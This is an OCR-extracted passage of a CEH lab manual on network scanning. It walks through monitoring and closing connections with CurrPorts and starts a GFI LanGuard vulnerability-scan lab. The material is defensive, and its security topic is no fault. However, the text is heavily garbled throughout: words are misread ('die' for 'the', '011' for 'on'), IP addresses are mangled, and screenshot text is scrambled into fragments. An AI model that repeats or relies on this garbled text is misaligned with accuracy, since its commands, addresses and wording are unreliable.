CT chrome.exe 2 m TCP 414S 10.0.0.7 443 https 173.194 3626 bom04501 -in-f26.1
^ f i r t f c x ere 1368 TCP 3981 127.0.0.1 3982 12700.1 WIN-D59MR5HL9F
£ fir« fc x « x • 1368 TCP 3982 127.0.0.1 3981 12700.1 WIN-D39MR5HL9E(£ fir« fc x «(« 1368 TCP 4013 10.0.0.7 443 https 173.1943622 bom01t01-in-f22.1
fircfcx.cxc 1368 TCP 4163 100.0.7 443 h ttp j 173.194.36.15 bom04!01 in f15.1־f 1rcfcxc.cc 1368 TCP 4166 100.0.7 443 h ttp j 173.194.360 bcm04501 -in-f0.1«
firef cx c<c 1368 TCP 4168 100.0.7 443 h ttp ; 74.125234.15 gra03s05in-f15.1e
\s , httpd.exe 1000 TCP 1070 a a a o 0.0.0.0
\th ttpd .exe 1800 TCP 1070 =
Qlsass.occ 564 TCP 1028 0.0.0.0 0.0.0.0
3 l» 5 5 a e 564 TCP 1028 =____ »_____
<1 ■11 T >
NirSoft Freeware. ht1p;/AnrA«v.rirsoft.net79 ~ctal Ports. 21 Remote Connections. 1 Selected
D isco v e r TCP/IP C o nn ectio n
C E H Lab M anual Page 104 Eth ica l Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
M odule 03 - S can n in g N e tw o rk s
FIGURE 4.1: Tlie CurrPorts main window with all processes, ports, and IP addresses2. CiirrPorts lists all die p r o c e s s e s and their IDs, protocols used, lo c a l
and rem o te IP a d d re s s , local and remote ports, and rem o te h o st
n a m e s.
3. To view all die reports as an HTML page, click V ie w H <־ TM L R e p o rts
A ־ ll Ite m s.
M °- x יCurrPorts
Remote Host Nam *
bcmQ4s0l-in־f26.1bcm04s0l-in-f26.1bcm04s01 -in-f26.1a23-57-204-20.dep S
bom04501-in־f26.1WIN-D39MR5HL9E
WIN-D39MR5HL9E
bem04s01-in-f22.1
bom04i01־in*f15.1
bcm04s0l*in-f0.1<gruC3s05-1n־M5.1e
Remote Address
173.1943526
173.194.3526
173.194.3526
23.5720420
173.194.3526
127.0.0.1
127.0.0.1
173.1943622
173.19436.15
173.19436.0
741252*4.15
0.0.0.0
0.0.0.0
Rem..
http
http
http
http
https
https
https
https
https
443
3962
3981
443
443
443
443
Address
).7
).7
).7
).7
).7
.0.1
.0.1
Show Grid Lines
Show Tooltips
Mark Odd/Even Rows
HTML Report ־ All I'errs
F5---TV.V,0.7
10.0.0.7
10.0.0.7
100.0.7
o.ao.oa a a o
File Edit I View | Options Help
X B 1Process KJa 1 I chrome.
C* chromel ^ chrome.C* chrome.^ chromc.(£ f irc fc x .c
g f - e f c x e R״fr#{h
(p firc fo x .e 1(c קז7ס 1 l i
(B fa e fc x u e 1368 TCP
J f t fM c o ta e I368 TCP® fr e fc x e te 1368 TCP
\h t to d .e x e 1800 TCP
V httpd .exe 1800 TCP
Q ls a s s e te 564 TCP561 TCP
HTML Report - Selected terns
Choose Columns
Auto Size Columns
4163
41564158
1070
1070
10281028
NirSoft Freeware, http.//w w w .rirso ft.ne t79Tct«l Ports, 21 Remote Connection!, 1 Selected
FIGURE 4.2 The CurrPorts with HTML Report - All Items4. The HTML Report a u to m a tic a lly opens using die default browser.
E<e Ldr View History Bookmarks 1001צ Hdp
I TCP/UDP Ports List j j f j__
^ (J f t e /// C;/ User 1/Ad mini st ralo r/D esfct op/ c p0fts-xt>£,r epcriJit ml ' Google P - •£־־־*־ ^
T C P /U D P P o r ts L is t
Created bv using C u rrP o rts
י
=
P m « j .Nam•P r o t i t i
IDProtoco l
I .o ra l P ort
I A ra l P ort X l B t
Loca l A d d iv itRemote
P ort
RcmoU׳P ort
.NameR tm v l« A d d r t i t
chxame rxc 2988 TCP 4052 10 0 0 7 443 https 173 194 36 4 bo
chiome.exc 2988 TCP 4059 10.0.0.7 80 http 173.194.36.17 bo
ch101nc.exe 2988 TCP 4070 10.0.0.7 80 http 173.194.36.31 bo
daome.exe 2988 TCP 4071 10.0.0.7 80 hltp 173.194.36.31 bo!
daome.exe 2988 TCP 4073 100.0.7 80 hup 173.194.36.15 boi
daome.exe 2988 TCP 4083 10.0.0.7 80 http 173.194.36.31 bo!
cfcrorae.exe 2988 TCP 4090 100.0.7 80 hnp 173.194.36.4 bo!
chfomc.cxc 2988 TCP 4103 100.0.7 80 hup 173.194.36.25 bo
bo>
chrome exe 2988 TCP 4104 10 0 0 7 80 hnp 173 194 36 25
FIGURE 4.3: Hie Web browser displaying CurrPorts Report - All Items5. To save the generated CurrPorts report from die web browser, click
F ile S <־ a v e P a g e A s ...C tr l+ S .
/ / CurrPorts utility is a standalone executable, which doesn't require any installation process or additional DLLs.
Q In the bottom left of the CurrPorts window, the status of total ports and remote connections displays.
E3 To check the countries of the remote IP addresses, you have to download the latest IP to Country file. You have to put the IpToCountry.csv״ file in the same folder as cports.exe.
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 105
M odule 03 - S can n in g N e tw o rk s
■3 TCP/UDP Ports List - Mozilla Firefoxד5
ק ז ו id * «1ry> Hitory Bookmaikt Took Hrlp
P *C i f ' Google»f1׳Dcsttop/q)D1ts-x64/rEpor: html
fJcw l ib CW*T
N*w׳ ’Mnd<*1* Ctrt*N
Cpen Fie.. CcrUO
S*.« Page As.. Ctr1*SSend Link- Pag* Setup-. PrmtPi&Kw E r r t .
ti* !.o ra lP ort
I o ra l P ort Name
Loca l A d d rv uRemote
P o r i
KemotcP ort
NameK eu io l* A d d n i t! , r o t i f j j >111•
ID
otocol!'!־
chiomc.exe 2988 TCP 4052 10.0.0.7 443 https 173.194.36.4 boj
cfc10me.exe 2988 TCP 4059 10.0.0.7 80 http 173.194.36.17 bo:
chrome.exe 2988 TCP 4070 10.0.0.7 80 hnp 173.194.36.31 bo:
chrome.exe 2988 TCP 4071 10.0.0.7 80 http 173.194.36.31 boi
chrome exe 2988 TCP 4073 100 0 7 80 http 173 194 36 15 boi
chrome exe 2988 TCP 408 ; 100 0 7 80 http 173 194 36 31 bo!
ch*omc exe 2988 TCP 4090 100 0 7 80 http 173 194 36 4 boi
chiome.exe 2988 TCP 4103 10.0.0.7 80 http 173.194.36.25 boj
daome.exe 2988 TCP 4104 10.0.0.7 80 http 173.194.36.25 b03
FIGURE 4.4: The Web browser to Save CurrPorts Report - All Items6. To view only die selected report as HTML page, select reports and click
V ie w H <־ TM L R e p o rts S ־ e le c te d Ite m s.
x-CurrPorts ׳1-1°
Address Rem... Rem... Remote Address Remote Host Nam
).7 80 h ttp 175.19436.26 bom04s01-1n־f26.1
).7 80 http 173.1943626 bom04s01-1n-f26.1
F80 http 173.1943626 bcm04s01-in־f26.1f
■0.7 80 h ttp 215720420 323-57-204-20.dep
P 7 445 h ttp : 173.1943526 bcm04s01-in-f26.1
.0.1 3982 127.0.0.1 WIN-D39MR5HL9E
.0.1 3981 127JX011 WIN-D39MR5HL9E
J>.7 443 https 173.1943622 bom04s01 -in-f22.1
File Edit | View | Options Help
X S (3 Show Grid Lחו א
Process Na P I Show Tooltips
C chrome. Mark Odd/Even Rows
HTML Report - All Items
HTML Report ■ Selected ternsC c h ro m e f O' chrome “
Ctrl ♦■Plus
F5
Choose Columns ® ,f ire fc x e Auto Size Columns
(gfircfcxe: Refreshfircf cx e<v
L f ircfox.cxc 1368 TCP 4163 1000.7 443 h ttp ; 173.194.36.15 bomOlsOl -in־f15.1
fircfcx.cxc 1368 TCP 4166 1000.7 443 h ttp : 173.194360 bomOlsOI -in־f0.1c
^ firc fc x .c x c 1368 TCP -4168 100.0.7 443 https 74125234.15 gruC3s05 in -f 15.1c
httpd.exe 1000 TCP 1070 0.0.0.0 0.0.0.0httpd.exe 1000 TCP 1070 s
Q lsassexe 564 TCP 1028 00.0.0 0.0.0.0
Q b a s te x e 564 TCP 1028« -------a .-------- 14nn T rn י»׳*־ו־ ___ AAAA AAAA
Hi 1 Soft Freeware. http. ׳,׳ ,w w w .r irsoft.net79 ~ctel Ports. 21 Remote Connections, 3 Selected
FIGURE 4.5: CurrPorts with HTML Report - Selected Items
7. Tlie selected rep o rt automatically opens using the d e fa u lt b ro w ser.
m CurrPorts allows you to save all changes (added and removed connections) into a log file. In order to start writing to the log file, check the ,Log Changes' option under the File menu
2Zy" By default, the log file is saved as cports.log in the same folder where cports.exe is located. You can change the default log filename by setting the LogFilename entry in the cports.cfg file.
^ Be aware! The log file is updated only when you refresh the ports list manually, or when the Auto Refresh option is turned on.
a You can also right- click on the Web page and save the report.
Eth ica l Hacking and Countermeasures Copyright O by EC-CoundlA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 106
M odule 03 - S can n in g N e tw o rk s
TCP/UDP Ports List - Mozilla Firefox I 1 ־ n J~xffi'g |d : Vico Hatory Bookmaiks Toob Help
[ j TCP/UDP Ports List | +
^ W c/'/C/lherv׳Admin 1strotor/Dr5fctop/'cport5־r64/rcpoדיi«0T1l (? ־ Google P | ,f t I
T C P /V D P P o rts L is t
Created by m ing C ii r rP o m
ProcessName
ProcessID
Protocol LocalPort
I>ocalPort.Name
LocalAddress
K«mut«Port
RemotePortName
KvuiotcAddress Remote Host Name State
dbiome.cxc 2988 TCP 4148 10.0.0.7 443 https 173.194.36-26 bom04sC 1 m. £26.1 e 100.net Established c:fire fox exe 1368 TCP 4163 10 0 0 7 443 https 173 194 36 15 bom04s01 tn - fl 5. Ie l00 .ne t Established C:
httpd cxc 1800 TCP 1070 Listening C:
In the filters dialog bos, you can add one or more filter strings (separated by spaces, semicolon, or CRLF).
FIGURE 4.6: The Web browser displaying CuaPorts with HTML Report - Selected Items8. To save the generated CurrPorts report from the web browser, click
F ile S <־ a v e P a g e A s .. .C tr l+ S
Mozilla Firefox ־ UDP Ports List׳/TCPי *r=>r ׳
fi *1r/Desktop/cpo»ts x6C repwthtml
Edfe Vir* Hutory Boolvfmki Took HWp N**׳T*b Clfl*T | + |
an*NOpen Fie... Ctrl»0
Ctrl-SPag eA ;.S*.«Sir'd link-
Established C
Established C
Remote Ilo t l .N io it
boxu04s01 -ui-1‘26. Ie l00.net
bom04s01-1a-115.lel00.net
RemoteAddress
173.1943626
173.19436 15
Kcm olePort
Name
https
https
T oral Remote Address Port
1 0 0 0 .7 443
443100.0.7
LocalPort
Name
LocalPoriID
Page :er.p. Pnnt Preview Prm L. fic it Offline
Name
4148TCP2988chtoxne.exe
41631368 TCPfiiefox-cxc
10TCP1800httpdexe ׳0
FIGURE 4.7: The Web brcnvser to Saw QirrPorts with HTML Report - Selected Items9. To view the p ro p e rt ie s of a port, select die port and click F ile <־
P ro p e rtie s .
/ / The Syntax for Filter String: [include | exclude]: [local | remote | both | process]: [tcp | udp | tcpudp] : [IP Range | Ports Range].
ש Command-line option: /stext <F11ename> means save the list of all opened TCP/UDP ports into a regular text file.
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 107
M odule 03 - S can n in g N e tw o rk s
r ® CurrPorts I - ] “ ' * m1 File J Edit View Options Help
I PNctlnfo C trM
Close Selected TCP Connections Ctri+T Local Address Rem... Rem.. Remote Address Remote Host Nam י׳ 1Kill Processes Of Selected Ports 10.0.0.7 80 http 173.194.3626 bom04301 - in-f26.1
Save Selected Items CtiUS 10.0.0.7 80 http 1׳־3.194.3626 bom04501 ־ in-f26.1
Properties Alt^Entei 110.0.0.7 80 http 1^3.194.36.26 bom04s01-in-f26.1
10J3J3.7 80 http 23.57.204.20 a23*57204-20־.dep ■Process Properties CtiUP
10.00.7 443 https 1Ti 194.36.26 bom04s01-in-f2MLog Changes 127.0.0.1 3982 127.aa1 WIN-D39MR5Hl9f
Open Log File 127.0.0.1 3031 127.0L0L1 WIM-D30MRSH10F
Clear Log File 10.0.0.7 443 httpc 1 1 ־,194.3622 bom04e01-m־f22.1
Advanced Options CtrUO 10.0.0.7 443 https 173.194.3615 bom04s01-m-f15.1
10.0.0.7 443 https 173.194.360 bom04s01 m־f0.1cExit 10.0.0.7 443 https 74.12523415 gru03s05-in־f15.1 e
\ j 1ttjd .exe 1800 TCP 1070 oaao 0 D S ) S )\h t to d .e x e 1800 TCP 1070 ::□ lsass.exe 564 TCP 1028 aao.o 0 D S J J JQlsass-exe $64 TCP 1028 r .
״ ־ T >
|7 9 Tctel Ports, 21 Remote Connections, 1 Selected NirSoft Freeware, h ttp :'www .n irsoft.net
b&i Command-line option: /stab <Filename> means save the list of all opened TCP/UDP ports into a tab-delimited text file.
FIGURE 4.8: CunPoits to view properties for a selected port10. The P ro p e rt ie s window appears and displays all the properties for the
selected port.
11. Click O K to close die P ro p e rt ie s window
*Properties
firefox.exe1368
TCP4166
10.0.0.7443| https________________1173.194.36.0 bom04s01-in-f0.1 e100.net EstablishedC:\Program Files (x86)\M0zilla Firefox\firefox.exe FirefoxFirefox14.0.1Mozilla Corporation8/25/2012 2:36:28 PMWIN-D39MR5HL9E4\Administrator
8/25/2012 3:32:58 PM
Process Name: Process ID:Protocol:Local Port:Local Port Name: Local Address: Remote Port:Remote Port Name: Remote Address: Remote Host Name: State:Process Path: Product Name:File Description:File Version: Company:Process Created On: User Name:Process Services: Process Attributes: Added On:Module Filename: Remote IP Country: Window Title:
OK
Command-line option: /shtml <Filename> means save the list of all opened TCP/UDP ports into an HTML file (Horizontal).
FIGURE 4.9: The CurrPorts Properties window for the selected port
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 108
M odule 03 - S can n in g N e tw o rk s
12. To close a TCP connection you think is suspicious, select the process and click F ile C <־ lo s e S e le c te d T C P C o n n e c t io n s (or Ctrl+ T).
-_,»r CurrPortsד
IPNetlnfo Ctrt+1
Close Selected TCP Connections Ctrl-T Local Address Rem... Rem... Remote Address Remote Host Nam I ׳ יKill Processes Of Selected Ports 10.0.0.7 60 http 173.19436.26 bom04s01-in־f26.1
Save Selected Items CtH-S 10.0.0.7 80 http 173.19436.26 bom04s01-in־f26.1
Properties
Process Properties
AH- Enter
Ctrl—P
10.0.0.7
10.0.0.7
10.0.0.7
80
80
443
http
http
https
173.19436.26 23.5730430
173.19436.26
bom04sC1 in-f26.1
023-57 204 2C.dep
bom04s01 in f26.1־
=
Log Changes 127.00.1 3932 127.0.0.1 WIN-D39MR5HL9e
Cpen Log File 127.00.1 3931 127.0.0.1 WIN-D39MR5HL9£
Clear Log File 10.0.0.7 443 http: 173.19436.22 bom04s01 -in-f22.1
Ad/snced Options CtH+G10.0.0.7 443 https 173.19436.15 bom04s01-in-f15.1
443 https 173.19436.0 bom04s01 ■in-f0.1sExit 10.0.0.7 443 https 74.125.234.15 gru03s05-in-f151e
^ httpd.exe 1 £03 TCP 1070 0D.0.0 0.0.0.0
httpd.exe 1800 TCP 1070 r□ is a s s ^ x e 564 TCP 1028 o m o o.aao
QtoSfcCNe 564 TCP 1Q28 r
^ J III ־ r I >
JIlirSort freew are. r-tto v/Yv*/n rsott.net7? Tot«! Porte, 21 Remote Connection! 1 Selected׳:
FIGURE 4.10: ,Hie CunPoits Close Selected TCP Connections option window13. To k ill the p r o c e s s e s of a port, select die port and click F i le K <־ ill
P r o c e s s e s of S e le c te d P o rts.
I ~ Iם ' *CurrPorts
File j Edit View Options Help
Loral Address Rem... Rem.. Remote Addrect Remote Host Nam *
10.0.07 80 http 173.14436.26 bom04t01*in-f26.1
10.0.0.7 80 http 173.194.3626 bomC4t01-in־f26.1
10.0.0.7 80 http 173.194.3626 bomC4j01 -in-f26.1
10.0.0.7 80 http 215720420 a23-57-204-20.dep s
10.0.0.7 443 https 173.1943636 bcmC4s01-in-f26.1127.0.0.1 3962 127.0.0.1 WIN-D39MR5HL9E
127.0.0.1 3981 127.0.0.1 WIN-D39MR5HL9E
10.0.0.7 443 https 173.1943632 bomC4s01-in-f22.1
10.0.07 443 https 173.19436.15 bom04s01־in־f15.1
10.0.0.7 443 https 173.19436.0 bom04$0l־in־f0.1e10.0.0.7 443 https 74125334.15 gru03s05-1n-M5.1e
an♦!C*rt*־T
PNetlnfoClose Selected TCP Connection*
kin Processes Of Selected Ports
Clri-S
A t-En ter
CtrKP
5ave Selected Items
Properties
Process Properties
Log Changes
Open Log File
Clear Log file
Advanced Options
Exit
0.0.0.0O.Q.Q.Oo.aao
___ / )A A A
V httod.exe 1800 TCP 1070
V httpd .exe 1800 TCP 1070
□ lw s s .e re 564 TCP 1028□ ka tc *re 561 TCP 1028
ר II
MirSoft Freeware. http-Jta/ww.rirsoft.net79 Tctel Ports, 21 Remote Connections, 1 Selected
FIGURE 4.11: The CurrPorts Kill Processes of Selected Ports Option Window14. To e x it from the CurrPorts utility, click F ile E <־ x it . The CurrPorts
window c lo s e s .
S T A S K 2
C lo se T C P Co nn ectio n
f i TASK 3K ill P ro c e s s
Eth ica l Hacking and Countermeasures Copyright O by EC Coundl־A ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 109
M odule 03 - S can n in g N e tw o rk s
1-1°CurrPons׳ - ’
File Edit View Options Help
PNetlnfo GH+I
Close Selected TCP Connections CtrKT .. Local Address Rem.. Rem״ Remcte Address Remcte Host NamK il Processes Of Selected Ports 10.0.0.7 80 http 173.194.36.26 bom04s01-in-f26.1
Save Selected Items Ctifc-S 10D.0.7 80 http 173.194.3626 bom04s01-in-f26.1
Properties
Procccc Properties
A t-Ea ter
CtH«־P
10.0.0.710.0.0.7
10.0.0.7
8080
443
httphttp
httpt
173.1943626 21 57.204.20
173.194.3626
bom04s01-in־f26.1r a23-57-204-20.de J bom04t01-in-f26.1|
lo g Changes 127.0.0.1 3082 127.0.0.1 WIN-D3QMR5H19P
Open Log File 127.0.0.1 3981 127X10.1 WIN-039MR5HL9E
Clear Log File 10.0.0.7 443 https 173.19436.22 bomC4101-in-f22.1
Advanced Option! C tH -010.0.0.7 443 https 173.194.36.1S bemC4i01 in f15.1־
10.0.0.7 443 https 173.194.36i) bcmC4s01 in f0.1qExt 1 10.0.0.7 443 https 74.125.234.15 gru03s05in-f15.1e
\th ttp d .e x e 1800 TCP 1070 0.0.0.0 0.0.0.0
\th ttp d .e x e 1800 TCP 1070 = =
Q lsas&exe 564 TCP 1028 0.0.00 0.0.0.0
H ls a is - a c 564 TCP 1028 =־ ־ ■ r r n __ a ו/ / \ a A A A A
Nil Soft free were. Mtpy/vvwvv.r it soft.net79 ז ctal Ports. 21 Remote Connections. 1 Selected
hid Command-line option: /sveihtml <Filename>Save the list of all opened TCP/UDP ports into HTML file (Vertical).
FIGURE 4.12: The CurrPoits Exit option window
L a b A n a ly s is
Document all die IP addresses, open ports and their running applications, and protocols discovered during die lab.
Tool/Utility Information Collected/Objectives Achieved
Profile Details: Network scan for open ports
Scanned Report:■ Process Name■ Process ID■ Protocol
CurrPorts ■ Local Port■ Local Address■ Remote Port■ Remote Port Name■ Remote Address■ Remote Host Name
feUI In command line, the syntax of /close command :/close < Local Address> <Local Port>< Remote Address >< Remote Port נ *.
Eth ica l Hacking and Countermeasures Copyright O by EC Counc11־All Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 110
M odule 03 - S can n in g N e tw o rk s
P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N SR E L A T E D T O T H I S L A B .
Q u e s t io n s
Analyze the results from CurrPorts by creating a filter string that displays only packets with remote TCP poit 80 and UDP port 53 and running it.
Analyze and evaluate die output results by creating a filter that displays only die opened ports in die Firefox browser.
Determine the use of each of die following options diat are available under die options menu of CurrPorts:
a. Display Established
b. Mark Ports Of Unidentified Applications
c. Display Items Widiout Remote Address
d. Display Items With Unknown State
Internet Connection Required
□ Yes 0 No
Platform Supported
0 Classroom 0 !Labs
1.
כ .
Q CurrPorts allows you to easily translate all menus, dialog boxes, and strings to other languages.
Eth ica l Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited.
C E H Lab M anual Page 111
M odule 03 - S can n in g N e tw o rk s
Lab
S c a n n i n g f o r N e t w o r k
V u l n e r a b i l i t i e s U s i n g t h e G F I
L a n G u a r d 2 0 1 2G F I L A N g w r d s c a n s n e tw o rk s a n d p o r ts to d e te c t, a sse ss, a n d c o rre c t a n y s e c u rity
v u ln e ra b ilitie s th a t a re fo u n d .
L a b S c e n a r io
You have learned in die previous lab to monitor T C P IP and U DP ports 011 your local computer or network using CurrPorts. This tool will automatically mark widi a pink color suspicious TCP/UDP ports owned by unidentified applications. To prevent attacks pertaining to TCP/IP; you can select one or more items, and dien close die selected connections.
Your company’s w e b se rv e r is hosted by a large ISP and is well protected behind a firewall. Your company needs to audit the defenses used by die ISP. After starting a scan, a serious vulnerability was identified but not immediately corrected by the ISP. All evil attacker uses diis vulnerability and places a b ackd o o r on th e se rver. Using die backdoor, the attacker gets complete access to die server and is able to manipulate the information 011 the server. The attacker also uses the server to leapfrog and attack odier servers 011 the ISP network from diis compromised one.
As a se c u rity ad m in istrato r and penetration te s te r for your company, you need to conduct penetration testing in order to determine die list of th re a ts and v u ln erab ilitie s to the network infrastructure you manage. 111 diis lab, you will be using G FI Lan G u ard 2012 to scan your network to look for vulnerabilities.
L a b O b je c t iv e s
The objective of diis lab is to help students conduct vulnerability scanning, patch management, and network auditing.
111 diis lab, you need to:
■ Perform a vulnerability scan
ICON KEYValuableinformation
✓ Test yourknowledge
Web exercise
Q Workbook review
Z U T o o ls d em o n strated in th is lab are a v a ilab le in D:\CEH- T o ols\C EH v8
M odule 03 S ca n n in g N etw o rks
Eth ica l Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 112
M odule 03 - S can n in g N e tw o rk s
■ Audit the network
■ Detect vulnerable ports
■ Identify security vulnerabilities
■ Correct security vulnerabilities with remedial action
L a b E n v ir o n m e n t
To perform die lab, you need:
■ GFI Languard located at D:\CEH -Tools\CEH v8 M odule 03 S ca n n in g
N etw o rksW u ln erab ility S ca n n in g Tools\G FI Lan G u ard
■ You can also download the latest version of G F I L a n g u a rd from the link http://www.gfi.com/la1111etsca11
■ If you decide to download the la te s t v e rs io n , then screenshots shown in the lab might differ
■ A computer running W indow s 2 012 S e rv e r as die host machine
■ W indow s S e rv e r 2008 running in virtual machine
■ Microsoft ■NET Fram ew o rk 2 .0
■ Administrator privileges to run die G FI LAN guard N etw ork S e cu r ity S ca n n e r
■ It requires die user to register on the G FI w e b s ite
http: / /www.gfi.com/la1111etscan to get a lic e n se key
■ Complete die subscription and get an activation code; the user will receive an em ail diat contains an activatio n co d e
L a b D u r a t io n
Time: 10 Minutes
O v e r v ie w o f S c a n n in g N e t w o r k
As an administrator, you often have to deal separately widi problems related to vu ln erab ility issues, patch m anagem en t, and network auditing. It is your responsibility to address all die viilnerability management needs and act as a virtual consultant to give a complete picture of a network setup, provide r isk a n a ly s is , and maintain a secure and co m p lian t n etw o rk state faster and more effectively.
Security scans or audits enable you to identify and assess possible r is k s within a network. Auditing operations imply any type of ch e ck in g performed during a network security audit. These include open port checks, missing Microsoft p a tch e s
and vu ln erab ilitie s, service infomiation, and user or p ro c e ss information.
Q You can download GFI LANguard from http: //wwwgfi. com.
Q GFI LANguard compatibly works on Microsoft Windows Server 2008 Standard/Enterprise, Windows Server 2003 Standard/ Enterprise, Windows 7 Ultimate, Microsoft Small Business Server 2008 Standard, Small Business Server 2003 (SP1), and Small Business Server 2000 (SP2).
C-J GFI LANguard includes default configuration settings that allow you to run immediate scans soon after the installation is complete.
Eth ica l Hacking and Countermeasures Copyright © by EC-CouncilAB Rights Reserved. Reproduction is Strictly Prohibited.
C E H Lab M anual Page 113
M odule 03 - S can n in g N e tw o rk s
L a b T a s k s
Follow die wizard-driven installation steps to install die GFI LANguard network scanner on die host machine windows 2012 server.
1. Navigate to W in d o w s S e rv e r 2 0 1 2 and launch the S ta r t menu by hovering the mouse cursor in the lower-left corner of the desktop
FIGURE 5.1: Windows Server 2012 - Desktop view2. Click the G F I L a n G u a rd 2 0 1 2 app to open the G F I L a n G u a rd 2 0 1 2
window
MaragerWindows Google
b m r ♦ *
Nnd
V
e FT־ £ S I
2)12
0
FIGURE 5.2 Windows Server 2012 - Apps3. The GFI LanGuard 2012 m ain w in d o w appears and displays die N etw ork
Audit tab contents.
B TASK 1S ca n n in g for
V u ln erab ilitie s
Zenmap file installs the following files:■ Nmap Core Files■ Nmap Path■ WinPcap 4.1.1■ Network Interface
Import■ Zenmap (GUI frontend)■ Neat (Modern Netcat)■ Ndiff
/ / To execute a scan successfully, GFI LANguard must remotely log on to target computers with administrator privileges.
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 114
M odule 03 - S can n in g N e tw o rk s
W D13CIA3 this ■י
GFI LanGuard 2012
I - | dashboard Seen Remedy ActMty Monitor Reports Configuration UtSties
Welcome to GFI LanGuard 2012GFI LanGuard 2012 is ready to audit your network fc* rtireta&dites
V iew DashboardInve30gate netvuor* wjinerawiir, status and audi results
Remodiate S ecurity IssuesDeploy missing patches uninstaiwwuihortwd *!*rare. turn on onllvirus and more
M anage AgentsEnable agents to automate netooric secant? audit and to tfstribute scanning load across client machines
JP9%
Local Computer Vulnerability Levelus• ־Nana9#*gents־or Launch a scan־ options 10,
the entile network.
M<
{ ' M o wc a f h 'e . — iim jIW -.
Cunent Vulnerability Level is: High
-IL aunch a ScanManually set-up andtnuser an aoerSess neVrxt seajrit/ audrt.
LATES1 NLWS
txkul a fyn le d ID I -XI }un jp \fe»g l ־ Ttft ■mu lar ־1 !1 w mr־»
DCport for APS81? IS. Mohr. Arrvhm !) 5 2 Pro nnd Standivd tr.vi •n- kuxkI 101 APS812-1S. Mobm Auob* 10.1.4 Pro mtd St—a-0 - -Mj ut
V# ?4-A*j-7017 - Patch MmuxirTimri - N n pi 1 ( 74 Aq 701? Patch Mfwtgnnnnl Added V*, 24-AJO-2012 - Patch M4uu«m< - Aiktod
ea The default scanning options which provide quick access to scanning modes are:■ Quick scan■ Full scan■ Launch a custom scan■ Set up a schedule scan
FIGURE 5.3: The GFI LANguard mam window4. Click die L a u n ch a S c a n option to perform a network scan.
GFI LanGuard 2012
«t Di»e1«s thb versionDoshboerd Scan Remediate AdMty Monitor Reports Configuration Ut*oes> I «־ I
View DashboardInvestigate network! wjineraMit, status andauairesults
R em ediate S ecurity IssuesDeploy missing patches unirwta■ urau*>0rf2e430**are. turn on antivirus ana more.
M anage AgentsEnable agents to automate neteror* secant* aud* and to tfstnbute scanning load across client machines
JP
9%
Welcome to GFI LanGuard 2012GFI LanGuard 2012 1& ready to audit your network k* *AmafrMws
Local Computer Vulnerublllty Level use ־van a;# Agents ־or Launch a scan־ options 10 auoa
the entire network.
t - &־.יז ־־־-^ iim jIM :
Cunent Vulnerability Luvul is; High
L aunch a ScanManually *<rt-up andtnwer anagerttest network»taint/ autirl
LAI LSI NLWS
< j ?4-Ajq-TOI? - fa it h M<au»)«nenl - N r . pnxkjrf !^ported POF-XLhan^r Mena 2 ל TOb meu la - IW31
V* 24Ajq-2012 Patch MnnnQcjncnr Added support for APS812-16. Adobe Acrobat 9 5 2 Pro and Standard -»־»־-24-Aju-2012 - Patch Md11rfut!«1t*t - Added support tor APS812-16. Adobe Acrobat 10.1.4 Pro and Standcffd - F=ad ־»■
FIGURE 5.4: The GFI LANguard main window indicating the Launch a Custom Scan option5. L a u n ch a N ew sc a n window will appear
i. 111 die Scan Target option, select lo ca lh o st from die drop-down list
ii. 111 die Profile option, select Full S c a n from die drop-down list
iii. 111 die Credentials option, select cu rren tly logged on u se r from diedrop-down list
6. Click S ca n .
m Custom scans are recommended:■ When performing a
onetime scan with particular scanning parameters/profiles
■ When performing a scan for particular network threats and/or system information
■ To perform a target computer scan using a specific scan profile
^ If intrusion detection software (IDS) is running during scans, GFI LANguard sets off a multitude of IDS warnings and intrusion alerts in these applications.
Eth ica l Hacking and Countermeasures Copyright O by EC Counc11־All Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 115
M odule 03 - S can n in g N e tw o rk s
־°r x ־ GF! LanGuard 2012’ן
CJ, Uiscuu ttm 1Dashboard Scan Ranrdijle Activ.ty Monitor Reports Conf!guraUon Jt Urn•> l«- Itauad iatneSan
Scar־a02׳t: P10•*:b a te : v M jf-J S^n v *Ot0en:־fc- ?axrrard:k»/T«rt(r ockcC on uso־ V I IZ * 1 1 ״
Scar Qaccre...
Son ■ n d ti Ovrrvlew SOM R ru lti Dcta ll<
FIGURE 5.5: Selecting an option for network scanning7. Scanning will start; it will take some time to scan die network. See die
following figure
m For large network environments, a Microsoft SQL Server/MSDE database backend is recommended instead of the Microsoft Access database.
m Quick scans have relatively short scan duration times compared to full scans, mainly because quick scans perform vulnerability checks of only a subset of the entire database. It is recommended to run a quick scan at least once a week.
8. After completing die scan, die sc a n resu lt will show in die left panel
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 116
M odule 03 - S can n in g N e tw o rk s
x□ GFI Lar>Guard2012,־I־y I I Dashboaid Scan Remcdute Actwty Monitor Reports Configuration Lttrfrtm&
t a u K k a lm k i n
Scan Target Kate:ccaftoct V ... | FalSar H
jsandffc: Eaaswofd:Cj-rr& t bcaed on iser V IIScan R r a k i DetailsScan R ru ik i ovrrvmn
Scan com ple ted !Summary 8f *ear resufs 9eneraf0fl <Jut>51*
1 >703 aw*! operations processed 20 <20 C׳ tcai׳Hgr>1313 Crecol'-.qh)3
Vulnerab ility leve l:
